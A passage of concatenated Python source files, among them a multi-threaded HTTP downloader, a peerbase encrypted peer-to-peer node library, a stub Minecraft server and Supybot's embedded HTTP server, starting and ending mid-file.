config_len = len(cls.configurations())
return [
ConfigGroup("Platform Attributes", 1, emulator_len),
ConfigGroup("NEM Parameters", emulator_len + 1, config_len)
]
def __init__(self, session, object_id=None):
super(EmaneGlobalModel, self).__init__(session, object_id)
def build_xml_files(self, config, interface=None):
raise NotImplementedError
|
client.py
|
from socket import *
import sys
import select
import math
import string
import threading
import argparse
import os.path
import time
#Argument parsing
parser = argparse.ArgumentParser(description = 'Get file from the web')
parser.add_argument('-n' , '--nthreads', type = int, required=True , help='Number of threads for the connection')
parser.add_argument('-i' , '--interval', type = float, required=True , help='Time interval of metric reporting')
parser.add_argument('-c' , '--tlp' ,type = str, required=True , help='TCP or UDP')
parser.add_argument('-f' , '--sourceaddress',type = str, required=True , help='File location on the web')
parser.add_argument('-o' , '--destinationaddress',type = str, required=True , help='File destination address')
parser.add_argument('-r' , '--resume' , action='store_true' , help='Resume download' )
args = parser.parse_args()
#default http header size for most servers
buff_size = 8192
#http port number
portNumber=80
#metric file keeping length of content downloaded and the time in which downloaded
metric = []
#array for bytes per thread
currentdataperthread = []
#geting file type from the header
def getFileType(fields):
if('content-type' not in fields):
ftype = 'txt'
return ftype
else:
#Getting content type format
ftype = fields['content-type']
ftype = ftype
ftype = ftype.split('/')[1]
ftype = ftype.split(';')[0]
if(ftype == 'plain'):
ftype = 'txt'
return ftype
#Converts file name to a valid file name.
def format_filename(s):
valid_chars = "-_.() %s%s" % (string.ascii_letters, string.digits)
filename = ''.join(c for c in s if c in valid_chars)
filename = filename.replace(' ','_') # I don't like spaces in filenames.
filename = filename.split('.')[0]
return filename
#Splitting URL into the host name, resource address, File name
def urlFields(url):
#removing protocol from the address
if('https' in url):
print("HTTPS")
url = url.replace('https://' , '')
elif('http' in url):
print("HTTP")
url = url.replace('http://' , '')
#Getting host, address, and file name
url = url.split("/")
host = url[0]
faddress = ''
for i in range(1,len(url)):
faddress += '/' + url[i]
fname = url[len(url)-1]
fname = format_filename(fname)
return host , faddress , fname
#Converts the response header message into a dictionary of header fields, splits status and the content from the HEADER response.
def getHeaderFeildsAndContent(data):
temp = data.split(b'\r\n\r\n')
header = temp[0]
content = temp[1]
header = header.decode('utf-8')
if(header == ''):
print("File Not Found")
exit(0)
header = header.split('\r\n')
status = header[0]
header = header[1:]
# header = header
fields = dict()
for i in range(len(header)):
temp = header[i].split(':')
fields[temp[0].lower()] = temp[1].lower()
return status ,fields , content
#check whether the requsted can be handled using threaded request
def checkThreadRequest(fields):
#can be done over multiple threads
if('content-length' in fields.keys() and 'accept-ranges' in fields.keys() and fields['accept-ranges'] != 'none'):
return 1
#can not be done over multiple threads
else:
return 2
return 0
#processing request for each thread
def processRequest(numberofthreads, dest, logFile , fileaddress ,resume):
global metric , currentdataperthread
#metric array
metric = [None] * numberofthreads
#saving number of threads info
with open(dest + logFile + "_ThreadInfo" , "wb") as myFile:
myFile.write(bytes([numberofthreads]))
myFile.close()
#creating threads and dividing the content over the multiple threads
bytesperthread = math.ceil(int(fields['content-length']) / numberofthreads)
print("Creating threads")
threads = [None]*numberofthreads
sockets = [None]*numberofthreads
#for checking if all the threads have fetched their required data
dataperthread = [None]*numberofthreads
metric = [None] * numberofthreads
#current thread data length used for metric presentation
currentdataperthread = [None] * numberofthreads
check = 0
filecontent = b''
for i in range(numberofthreads):
threadLog = (dest + str(i) + '_' + logFile.split('.')[0] + '_Thread')
begin = i * bytesperthread
end = (begin + bytesperthread - 1)
if(i == numberofthreads - 1):
end=int(fields['content-length']) - 1
filemode = "wb"
#data per thread to check if the file should be created or not
dataperthread[i] = end - begin + 1
#checking if resume is true, resuming file.
if(resume):
filemode = "ab"
begin += (os.stat(threadLog).st_size)
if(begin - 1 == end):
print("Thread complete")
threads[i] = threading.Thread()
else:
print("Thread:" , i , " Range: " , begin ,"-" , end)
sockets[i] = socket(AF_INET,SOCK_STREAM)
threads[i] = myThread(i ,host, faddress , begin , end , sockets[i] , threadLog)
else:
print("Thread:" , i , " Range: " , begin ,"-" , end)
sockets[i] = socket(AF_INET,SOCK_STREAM)
threads[i] = myThread(i ,host, faddress , begin , end , sockets[i] , threadLog)
open(threadLog , filemode)
#current data assigned to the thread
currentdataperthread[i] = end - begin + 1
#starting threads all at once
for thread in threads:
thread.start()
#creating metric thread
metricsThreadTotal = threading.Thread(target=totalReport, args=(args.interval,), daemon=True)
metricsThreadTotal.start()
#waiting for the threads to end
for thread in threads:
thread.join()
#checnking if all the threads are available
for i in range(numberofthreads):
threadLog = (dest + str(i) + '_' + logFile.split('.')[0] + '_Thread')
if(os.stat(threadLog).st_size == dataperthread[i]):
check+=1
#creting the final by merging all the thread files and removing the temperary files.
if(check == numberofthreads):
finalFile = open(fileaddress , 'ab')
for i in range(numberofthreads):
threadLog = (dest + str(i) + '_' + logFile.split('.')[0] + '_Thread')
with open(threadLog, "rb") as myFile:
finalFile.write(myFile.read())
myFile.close()
os.remove(threadLog)
os.remove(dest + logFile + "_ThreadInfo")
print("File complete!")
else:
print("File incomplete, please resume.")
#thread class for handling the request
class myThread (threading.Thread):
def __init__(self, tid,host, faddress, begin, end, clientSocket, threadLog):
threading.Thread.__init__(self)
self.tid = tid
self.host = host
self.faddress = faddress
self.begin = begin
self.end = end
self.clientSocket = clientSocket
self.threadLog = threadLog
def run(self):
send_request(self.tid ,self.host, self.faddress, self.begin, self.end, self.clientSocket, self.threadLog)
#Getting data for each thread
def send_request(tid ,host, faddress, begin, end, clientSocket, threadLog):
# print("Connecting to host: " , host , portNumber)
global numberofthreads, metric
# print("This is number of threads: " , numberofthreads)
if tid != (numberofthreads - 1):
rangeBytes = 'bytes={}-{}'.format(begin,end)
else:
rangeBytes = 'bytes={}-'.format(begin)
#connecting to the server, and sending the HTTP GET request.
clientSocket.connect((host , portNumber))
clientSocket.sendall(b'GET %b HTTP/1.1\r\nHOST: %b \r\nRange: %b \r\n\r\n' %(bytes(faddress , 'utf-8'), bytes(host , 'utf-8'), bytes(rangeBytes, 'utf-8')))
print("request sent for thread: ", tid , '\n')
startTime = time.clock()
data = clientSocket.recv(buff_size)
endTime = time.clock()
#splitting the first response into header fields, data, and status
status , fields , threadcontent = getHeaderFeildsAndContent(data)
metric[tid] = [(endTime - startTime) , len(threadcontent)]
#opening current thread log for inserting data
with open(threadLog , "ab") as myFile:
myFile.write(threadcontent)
myFile.close()
#checking if the address is valid
if(status == 'HTTP/1.1 200 OK' or status == 'HTTP/1.1 206 Partial Content'):
#getting content length from the header & the type of file for each thread
contentLength = int(fields['content-length'])
#getting data, till the data is equal to the content length or there is no more data. A 15 second safety timeout is added for delays.
while select.select([clientSocket], [], [], 15)[0]:
startTime = time.clock()
data = clientSocket.recv(buff_size)
if not data: break
#appending the content to aach thread log file.
with open(threadLog, "ab") as myFile:
myFile.write(data)
myFile.close()
#storing time and length of content downloaded.
endTime = time.clock()
metric[tid][0] += (endTime - startTime)
metric[tid][1] += len(data)
#ending the loop when complete data is received.
if(int(contentLength) == int(os.stat(threadLog).st_size)): break
else:
print("Status: " , status)
#closing socket.
clientSocket.close()
#Metric reporting
def totalReport(sleepTime):
# Prints the total download and speed
global metric, numberofthreads, currentdataperthread
#the total data that is to be downloaded
absoluteData = 0
for datalength in currentdataperthread:
absoluteData+=datalength
absoluteData = absoluteData / 1024
#for the thread to keep on working untill the main thread finishes.
while True:
totalTime = 0.0
totalData = 0
for threadNumber in range(numberofthreads):
if(metric[threadNumber] != None):
dtime = metric[threadNumber][0]
data = metric[threadNumber][1] / 1024
totalTime += dtime
totalData += data
if(dtime != 0.0):
speed = data / dtime
else:
totalData+=data
speed = 0
#if threads data is complete
if(metric[threadNumber][1] != currentdataperthread[threadNumber]):
str = "Connection {}: {}/{}, download speed: {} kb/s" \
.format(threadNumber, data, currentdataperthread[threadNumber] / 1024, speed)
print(str,'\n')
else:
str = "Connection {}: , Completed" \
.format(threadNumber)
print(str,'\n')
#if all the data is complete
if(totalTime != 0.0 and totalData != absoluteData):
str = "Total: {}/{}, download speed: {} kb/s" \
.format(totalData, absoluteData, totalData / totalTime)
print(str,'\n')
print("Next iterval\n")
else:
print("Download Completed.")
#putting the thread to sleep for the time interval
time.sleep(sleepTime)
#main()
if __name__ == '__main__':
#getting url and splitting it into separate fields
url = args.sourceaddress
host , faddress , fname = urlFields(url)
print("Host: " , host , " Address: " , faddress , " Name: " , fname)
#converting fname to valid file name
fname = format_filename(fname)
#getting destination address from the arguments
dest = args.destinationaddress
if(dest == '.'):
dest = ''
#connection to get HEADER of requested page to check whether the page is correct and what kind of request can be handled.
s = socket(AF_INET, SOCK_STREAM)
s.connect((host , portNumber))
#sending header request
s.sendall(b'HEAD %b HTTP/1.1\r\nHOST: %b \r\n\r\n' %(bytes(faddress , 'utf-8') , bytes(host , 'utf-8')))
print("Request Sent \n")
data = s.recv(buff_size)
status ,fields , content = getHeaderFeildsAndContent(data)
ftype = getFileType(fields)
#Creating file address
fileaddress = dest + fname + '.' + ftype
logFile = fname
#proceeding only if the address is a valid http address
print("HEADER: " , status)
if(status == 'HTTP/1.1 200 OK' or status == 'HTTP/1.1 206 Partial Content'):
print("Valid Request")
#If resume is called, checking if the file exists and continuing from the part left.
if(args.resume):
print("Checking resume")
if(os.path.isfile(fileaddress)):
print("File exists")
print("Number of bytes: " , os.stat(fileaddress).st_size)
if(int(os.stat(fileaddress).st_size) == int(fields['content-length'])):
print("Files is complete.")
exit(0)
else:
#getting number of threads from the thread info file.
print('Resuming Download')
with open(dest + logFile + "_ThreadInfo" , "rb") as myFile:
numberofthreads = int.from_bytes(myFile.read(), byteorder='little')
myFile.close()
print(numberofthreads)
processRequest(numberofthreads, dest ,logFile, fileaddress, True)
exit(0)
else:
print("File doesn't exist")
#if file doesnt exist
for field in fields.keys():
print(field, " : " , fields[field])
print("\n\n")
numberofthreads = args.nthreads
typeofrequest = checkThreadRequest(fields)
#checking if the request can be handled over multiple connections or not.
if(typeofrequest == 1):
open(fileaddress , 'wb')
print('request will be handled over multiple connections')
processRequest(numberofthreads, dest, logFile , fileaddress, False)
elif(typeofrequest == 2):
open(fileaddress , 'wb')
numberofthreads = 1
print('request will be handled over a Single connection')
processRequest(numberofthreads, dest, logFile, fileaddress, False)
else:
print("Invalid Request")
else:
print("Invalid Request")
|
__init__.py
|
from cryptography.fernet import Fernet
import http.server
import requests
from socket import *
import threading
import time
import base64
import json
import typing
import copy
import traceback
from peerbase.peer_utils import *
import random
import hashlib
from concurrent.futures import ThreadPoolExecutor
def process_request(data, node):
data = json.loads(node.decode(data))
command = data['command']
args = data['args']
kwargs = data['kwargs']
try:
resp = get_multikey(command, node.registered_commands)(
node, args, kwargs)
stat = 200
except InternalKeyError:
stat = 404
resp = f'CMD "{command}" NOT FOUND'
except:
stat = 500
resp = traceback.format_exc()
return stat, resp
class LocalServerHandler(http.server.BaseHTTPRequestHandler):
def do_POST(self):
node = self.server.node
content_len = int(self.headers.get('content-length'))
stat, resp = process_request(self.rfile.read(content_len), node)
self.send_response(stat)
self.end_headers()
self.wfile.write(node.encode(json.dumps({
'timestamp': time.time(),
'response': resp
})))
self.wfile.write(b'\n')
def log_message(self, format, *args):
pass
class LoadedThreadingHTTPServer(http.server.ThreadingHTTPServer):
def __init__(self, server_address: typing.Tuple[str, int], RequestHandlerClass: typing.Callable[..., LocalServerHandler], node):
super().__init__(server_address, RequestHandlerClass)
self.node = node
def format_dict(dct, sep='.', start=''):
dct = dct.copy()
to_ret = []
for i in dct.keys():
if type(dct[i]) == dict:
to_ret.extend(format_dict(dct[i], sep=sep, start=f'{start}{i}.'))
else:
to_ret.append(start+i)
return to_ret
class Node:
# Default commands
def _echo(self, node, args, kwargs):
return f'Echoed args {str(args)} and kwargs {str(kwargs)} at time [{time.ctime()}]'
def list_methods(self, node, args, kwargs):
return format_dict(self.registered_commands)
def get_peers(self, node, args, kwargs):
return self.peers
# Threaded Loops
def launch_advertising_loop(self):
while self.running:
data = f'{self.network}.{self.name}|{ip()}:{self.ports["local_server"]}'.encode(
'utf-8')
self.advertising_socket.sendto(
data, ('<broadcast>', self.ports['local_advertiser']))
time.sleep(1)
self.advertising_socket.close()
# Get dict of {peer name: (peer IP, peer port)} for all peers in local network
def discover(self, timeout=1.5):
s = socket(AF_INET, SOCK_DGRAM) # create UDP socket
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind(('', self.ports['local_advertiser']))
ct = time.time()
discovered = {}
while time.time() < ct+timeout:
data, addr = s.recvfrom(1024)
data = data.decode('utf-8')
if data.startswith(self.network+'.'):
try:
identifier, ip_addr = data.split('|')
except ValueError:
continue
try:
node_network, node_name = identifier.split('.')
except ValueError:
continue
try:
node_ip, node_port = ip_addr.split(':')
except ValueError:
continue
if node_name != self.name:
discovered[node_name] = (node_ip, int(node_port))
return discovered
def launch_discovery_loop(self):
while self.running:
self.peers = self.discover()
def process_single_buffer(self, pid, buffer_data):
stat, resp = process_request(buffer_data['data'], self)
try:
resp = requests.post(
url=f'http://{buffer_data["remote"]}/send/',
json={
'target': buffer_data['originator'],
'data': self.encode(json.dumps({
'status': stat,
'result': resp
})).decode('utf-8'),
'packet_id': pid,
'originator': self.name,
'r_type': 'response',
'remote_addr': buffer_data['remote']
}
)
except ConnectionError:
pass
def remote_keepalive_loop(self, target):
while self.running:
try:
resp = requests.post(f'http://{target}/ping/', json={
'node_name': self.name,
'node_network': self.network,
'known_servers': list(self.server_info.keys())
})
dat = resp.json()
for i in dat['peers']:
if not i == self.name:
if not i in self.remote_peers.keys():
self.remote_peers[i] = {target}
else:
self.remote_peers[i].add(target)
for s in dat['servers']:
if not s in self.server_info.keys() and len(self.server_info.keys()) < self.max_remotes:
self.server_info[s] = {
'maintain': False,
'active': True,
'peers': set(),
'thread': threading.Thread(target=self.remote_keepalive_loop, args=[s], name=f'{self.network}.{self.name}.remote_keepalive[{s}]', daemon=True)
}
self.server_info[s]['thread'].start()
for b in dat['buffer'].keys():
if dat['buffer'][b]['type'] == 'response':
self.remote_buffer[b] = dat['buffer'][b]
else:
threading.Thread(target=self.process_single_buffer, args=[
b, dat['buffer'][b]], name=f'{self.network}.{self.name}.process_request[{b}]', daemon=True).start()
except requests.ConnectionError:
self.server_info[target]['active'] = False
if not self.server_info[target]['maintain']:
del self.server_info[target]
for k in list(self.remote_peers.keys()):
if target in self.remote_peers[k]:
self.remote_peers[k].remove(target)
return
if self.server_info[target]['active']:
time.sleep(self.keepalive_tick)
else:
time.sleep(30)
def __init__(
self,
name,
network,
network_key,
ports=[1000, 1001],
servers=None,
registered_commands={},
use_local=True,
keepalive_tick=0.25,
max_remotes=None
):
'''
name: Name of node in network (cannot contain ".", "|", or ":")
network: Name of network (cannot contain ".", "|", or ":")
network_key: str encryption key to use within the network
ports: [local server port, local UDP advertiser port]
servers: address or list of addresses of remote middleman servers
registered_commands: dict (may be nested to have sub/sub-sub/etc commands) of command names related to functions.
Reserved names in top-level tree: __echo__, __list_commands__, __peers__
use_local: boolean, make local connections/do not make local connections
keepalive_tick: time between keepalive requests
max_remotes: max number of remotes to connect to at one time. Must be >= len(servers), or None to remove the limit.
'''
if '.' in name or '|' in name or ':' in name:
raise ValueError(
f'Node name {name} contains reserved characters (".","|", or ":").')
if '.' in network or '|' in network or ':' in network:
raise ValueError(
f'Network name {network} contains reserved characters (".","|", or ":").')
if len(ports) != 2:
raise ValueError('The list of ports to use must contain 2 values.')
self.network = network
self.name = name
self.crypt = Fernet(network_key.encode('utf-8'))
self.ports = {
'local_server': ports[0],
'local_advertiser': ports[1]
}
self.features = {}
if servers == None:
self.features['remote'] = False
print(
'WARNING: No server specified. Will not be capable of forming remote connections.')
self.remote_buffer = None
else:
self.features['remote'] = True
if type(servers) == str:
servers = [servers]
if max_remotes != None and max_remotes < len(servers):
raise ValueError(
'max_remotes cannot be less than the number of servers provided.')
self.server_info = {s: {
'maintain': True,
'active': True,
'peers': set(),
'thread': threading.Thread(target=self.remote_keepalive_loop, args=[s], name=f'{self.network}.{self.name}.remote_keepalive[{s}]', daemon=True)
} for s in servers}
self.remote_buffer = {}
self.features['local'] = bool(use_local)
if not self.features['remote'] and not self.features['local']:
raise ValueError(
'Must enable either local or remote connections, or both.')
self.max_remotes = max_remotes
if self.max_remotes == None:
self.max_remotes = 1e99
self.local_server = None
self.running = False
self.advertising_socket = socket(AF_INET, SOCK_DGRAM)
self.advertising_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.advertising_socket.bind(('', 0))
self.advertising_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.advertising_thread = threading.Thread(
target=self.launch_advertising_loop, name=f'{self.network}.{self.name}.advertiser', daemon=True)
self.peers = {}
self.remote_peers = {}
self.keepalive_tick = keepalive_tick
self.discovery_thread = threading.Thread(
target=self.launch_discovery_loop, name=f'{self.network}.{self.name}.discoverer', daemon=True)
self.registered_commands = registered_commands.copy()
self.registered_commands['__echo__'] = self._echo
self.registered_commands['__list_commands__'] = self.list_methods
self.registered_commands['__peers__'] = self.get_peers
def decode(self, data): # Recieves encrypted data in base64, returns string of data
if type(data) == bytes:
data = data.decode('utf-8')
decoded_b64 = base64.urlsafe_b64decode(data.encode('utf-8'))
return self.crypt.decrypt(decoded_b64).decode('utf-8')
def encode(self, data): # Recieves raw string data, returns base64-encoded encrypted data
encrypted = self.crypt.encrypt(data.encode('utf-8'))
return base64.urlsafe_b64encode(encrypted)
def start(self): # Start the node. This method is blocking.
self.running = True
if self.features['local']:
self.local_server = LoadedThreadingHTTPServer(
(ip(), self.ports['local_server']), LocalServerHandler, self)
self.advertising_thread.start()
self.discovery_thread.start()
if self.features['remote']:
[i['thread'].start() for i in self.server_info.values()]
if self.features['local']:
self.local_server.serve_forever()
# Start the Node in a separate thread
def start_multithreaded(self, thread_name=None, thread_group=None):
proc = threading.Thread(
name=thread_name, target=self.start, group=thread_group, daemon=True)
proc.start()
if self.features['local']:
self.peers = self.discover()
return proc
def _command_one(self, command_path, args, kwargs, target, raise_errors, timeout):
ret = None
i = target
if i in self.peers.keys() and self.features['local']:
'''if raise_errors:
raise LookupError(
f'Could not find target {i} in peers. Available peers: {str(len(self.peers.keys()))}')
else:
continue'''
try:
resp = requests.post(
url=f'http://{self.peers[i][0]}:{self.peers[i][1]}',
data=self.encode(json.dumps({
'timestamp': time.time(),
'command': command_path,
'args': args,
'kwargs': kwargs,
'initiator': f'{self.network}.{self.name}'
})),
timeout=timeout
)
except requests.Timeout:
if raise_errors:
raise TimeoutError(
f'Attempt to reach peer {i} timed out after {str(timeout)} seconds.')
else:
ret = None
if resp.status_code == 200:
ret = json.loads(self.decode(resp.text))[
'response']
else:
ret = None
print(
f'Encountered error with status {str(resp.status_code)}:\n{json.loads(self.decode(resp.text))["response"]}')
elif i in self.remote_peers.keys() and self.features['remote']:
while len(self.remote_peers[i]) > 0 and ret == None:
remote_target = random.choice(list(self.remote_peers[i]))
pid = hashlib.sha256(
str(time.time() + random.random()).encode('utf-8')).hexdigest()
try:
resp = requests.post(
url=f'http://{remote_target}/send/',
json={
'target': i,
'data': self.encode(json.dumps({
'timestamp': time.time(),
'command': command_path,
'args': args,
'kwargs': kwargs,
'initiator': f'{self.network}.{self.name}'
})).decode('utf-8'),
'packet_id': pid,
'originator': self.name,
'r_type': 'request',
'remote_addr': remote_target
}
)
if resp.status_code != 200:
raise requests.ConnectionError
wait_start = time.time()
if timeout == None:
_t = -1
else:
_t = timeout + 0
while not pid in self.remote_buffer.keys() and (wait_start + _t > time.time() or _t == -1):
pass
if pid in self.remote_buffer.keys():
res = json.loads(self.decode(
copy.deepcopy(self.remote_buffer[pid])['data']))
if res['status'] == 200:
ret = res['result']
else:
print(
f'Encountered error with status {str(res["status"])}:\n{res["result"]}')
del self.remote_buffer[pid]
else:
raise requests.ConnectionError
except (requests.ConnectionError, requests.Timeout):
self.remote_peers[i].remove(remote_target)
if ret == None:
del self.remote_peers[i]
if raise_errors:
raise TimeoutError(
f'Attempt to reach peer {i} remotely failed.')
else:
pass
else:
if raise_errors:
raise LookupError(
f'Could not find target {i} in remote peers. Available peers: {str(len(self.remote_peers.keys()))}')
else:
pass
return ret
def command(self, command_path='__echo__', args=[], kwargs={}, target='*', raise_errors=False, timeout=5, max_threads=32):
if target == '*' or target == []:
targets = list(self.peers.keys())
targets.extend(list(self.remote_peers.keys()))
elif type(target) == list:
targets = target[:]
else:
targets = [target]
with ThreadPoolExecutor(max_workers=max_threads) as executor:
returned = {i:executor.submit(self._command_one,command_path,args,kwargs,i,raise_errors,timeout) for i in targets}
returned = {i:returned[i].result() for i in returned.keys()}
if len(targets) == 1:
return returned[list(returned.keys())[0]]
else:
return returned
# Register <function> at <command_path>
def register_command(self, command_path, function):
try:
translated_path = '"]["'.join([i for i in command_path.split('.')])
exec(f'self.registered_commands["{translated_path}"] = function', globals(), {
'self': self, 'function': function})
except KeyError:
raise KeyError(
f'Unable to register {command_path} as the path to it does not exist.')
# Register dict of <commands>. If <top> != None, will use <top> as the starting point.
def register_commands(self, commands, top=None):
if top == None:
for i in commands.keys():
if type(commands[i]) == dict:
cmd = commands[i].copy()
else:
cmd = copy.copy(commands[i])
self.registered_commands[i] = cmd
else:
for i in commands.keys():
if type(commands[i]) == dict:
cmd = commands[i].copy()
else:
cmd = copy.copy(commands[i])
try:
translated_path = '"]["'.join([i for i in top.split('.')])
exec(f'self.registered_commands["{translated_path}"][i] = cmd', globals(), {
'self': self, 'i': i, 'cmd': cmd})
except KeyError:
raise KeyError(
f'Unable to register commands to {top} as the path to it does not exist.')
# Utility function to list methods of target(s). Similar args as with command()
def get_commands(self, target='*', raise_errors=False, timeout=4):
return self.command(command_path='__list_commands__', target=target, raise_errors=raise_errors, timeout=timeout)
|
server.py
|
#!/usr/bin/env python3
import socket
import threading
from .connection import MCConnection
from .crypto import generate_keys
from .world import MCWorld
class MCServer:
PROTOCOL = 107
PROTOCOL_NAME = "1.9"
closed = False
def __init__(self, config):
self.config = config
af = socket.AF_INET6 if config.get("ipv6", False) else socket.AF_INET
self.sock = socket.socket(af, socket.SOCK_STREAM)
self.connections = []
self.players = []
self.entities = []
self.private_key, self.public_key = generate_keys()
self.world = MCWorld(config.get("world", None))
self.thread = threading.Thread(target=self._worker)
def start(self):
self.thread.start()
def join(self, *args, **kwargs):
self.thread.join(*args, **kwargs)
def _worker(self):
host = self.config.get("host", "")
port = self.config.get("port", 25565)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((host, port))
self.sock.listen(self.config.get("max_connections", 32))
print("est. <{}:{}>".format(host, port))
while True:
conn, addr = self.sock.accept()
if len(self.connections) < self.config.get("max_connections", 32):
self.connections.append(MCConnection(self, (conn, addr)))
print("open <{}:{}>: ({} total)".format(addr[0], addr[1], len(self.connections)))
else:
# send unavailable connection error
pass
def response_data(self):
d = {
"version": {
"name": self.PROTOCOL_NAME,
"protocol": self.PROTOCOL
},
"players": {
"max": self.config.get("players", {}).get("max", 10),
"online": len([p for p in self.players if p])
},
"description": {
"text": self.config.get("description", "A Minecraft Server running with ClaspyMC")
}
}
return d
def close(self):
if not self.closed:
for conn in self.connections:
if conn: conn.close()
self.sock.close()
self.closed = True
def __bool__(self):
return not self.closed
|
httpserver.py
|
###
# Copyright (c) 2011, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
An embedded and centralized HTTP server for Supybot's plugins.
"""
import cgi
from threading import Event, Thread
from cStringIO import StringIO
from SocketServer import ThreadingMixIn
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
# For testing purposes
from SocketServer import StreamRequestHandler
import supybot.log as log
import supybot.conf as conf
import supybot.world as world
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization()
configGroup = conf.supybot.servers.http
class RequestNotHandled(Exception):
pass
class RealSupyHTTPServer(HTTPServer):
# TODO: make this configurable
timeout = 0.5
callbacks = {}
running = False
def hook(self, subdir, callback):
if subdir in self.callbacks:
log.warning(('The HTTP subdirectory `%s` was already hooked but '
'has been claimed by another plugin (or maybe you '
'reloaded the plugin and it didn\'t properly unhook. '
'Forced unhook.') % subdir)
self.callbacks[subdir] = callback
def unhook(self, subdir):
callback = self.callbacks.pop(subdir) # May raise a KeyError. We don't care.
callback.doUnhook(self)
return callback
class TestSupyHTTPServer(RealSupyHTTPServer):
def __init__(self, *args, **kwargs):
pass
def serve_forever(self, *args, **kwargs):
pass
def shutdown(self, *args, **kwargs):
pass
if world.testing:
SupyHTTPServer = TestSupyHTTPServer
else:
SupyHTTPServer = RealSupyHTTPServer
class SupyHTTPRequestHandler(BaseHTTPRequestHandler):
def do_X(self, callbackMethod, *args, **kwargs):
if self.path == '/':
callback = SupyIndex()
elif self.path == '/robots.txt':
callback = RobotsTxt()
else:
subdir = self.path.split('/')[1]
try:
callback = self.server.callbacks[subdir]
except KeyError:
callback = Supy404()
# Some shortcuts
for name in ('send_response', 'send_header', 'end_headers', 'rfile',
'wfile', 'headers'):
setattr(callback, name, getattr(self, name))
# We call doX, because this is more supybotic than do_X.
getattr(callback, callbackMethod)(self,
'/' + '/'.join(self.path.split('/')[2:]),
*args, **kwargs)
def do_GET(self):
self.do_X('doGet')
def do_POST(self):
if 'Content-Type' not in self.headers:
self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
self.do_X('doPost', form=form)
def do_HEAD(self):
self.do_X('doHead')
def log_message(self, format, *args):
log.info('HTTP request: %s - %s' %
(self.address_string(), format % args))
class SupyHTTPServerCallback:
"""This is a base class that should be overriden by any plugin that want
to have a Web interface."""
name = "Unnamed plugin"
defaultResponse = _("""
This is a default response of the Supybot HTTP server. If you see this
message, it probably means you are developing a plugin, and you have
neither overriden this message or defined an handler for this query.""")
def doGet(self, handler, path, *args, **kwargs):
handler.send_response(404)
self.send_header('Content_type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(self.defaultResponse))
self.end_headers()
self.wfile.write(self.defaultResponse)
doPost = doHead = doGet
def doUnhook(self, handler):
"""Method called when unhooking this callback."""
pass
class Supy404(SupyHTTPServerCallback):
"""A 404 Not Found error."""
name = "Error 404"
response = _("""
I am a pretty clever IRC bot, but I suck at serving Web pages, particulary
if I don't know what to serve.
What I'm saying is you just triggered a 404 Not Found, and I am not
trained to help you in such a case.""")
def doGet(self, handler, path, *args, **kwargs):
handler.send_response(404)
self.send_header('Content_type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(self.response))
self.end_headers()
self.wfile.write(self.response)
doPost = doHead = doGet
class SupyIndex(SupyHTTPServerCallback):
"""Displays the index of available plugins."""
name = "index"
defaultResponse = _("Request not handled.")
template = """
<html>
<head>
<title>""" + _('Supybot Web server index') + """</title>
</head>
<body>
<p>""" + _('Here is a list of the plugins that have a Web interface:') +\
"""
</p>
%s
</body>
</html>"""
def doGet(self, handler, path):
plugins = [x for x in handler.server.callbacks.items()]
if plugins == []:
plugins = _('No plugins available.')
else:
plugins = '<ul><li>%s</li></ul>' % '</li><li>'.join(
['<a href="/%s/">%s</a>' % (x,y.name) for x,y in plugins])
response = self.template % plugins
handler.send_response(200)
self.send_header('Content_type', 'text/html')
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response)
class RobotsTxt(SupyHTTPServerCallback):
"""Serves the robot.txt file to robots."""
name = 'robotstxt'
defaultResponse = _('Request not handled')
def doGet(self, handler, path):
response = conf.supybot.servers.http.robots().replace('\\n', '\n')
handler.send_response(200)
self.send_header('Content_type', 'text/html')
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response)
httpServer = None
def startServer():
"""Starts the HTTP server. Shouldn't be called from other modules.
The callback should be an instance of a child of SupyHTTPServerCallback."""
global httpServer
log.info('Starting HTTP server.')
address = (configGroup.host(), configGroup.port())
httpServer = SupyHTTPServer(address, SupyHTTPRequestHandler)
Thread(target=httpServer.serve_forever, name='HTTP Server').start()
def stopServer():
"""Stops the HTTP server. Should be run only from this module or from
when the bot is dying (ie. from supybot.world)"""
global httpServer
if httpServer is not None:
log.info('Stopping HTTP server.')
httpServer.shutdown()
httpServer = None
if configGroup.keepAlive():
startServer()
def hook(subdir, callback):
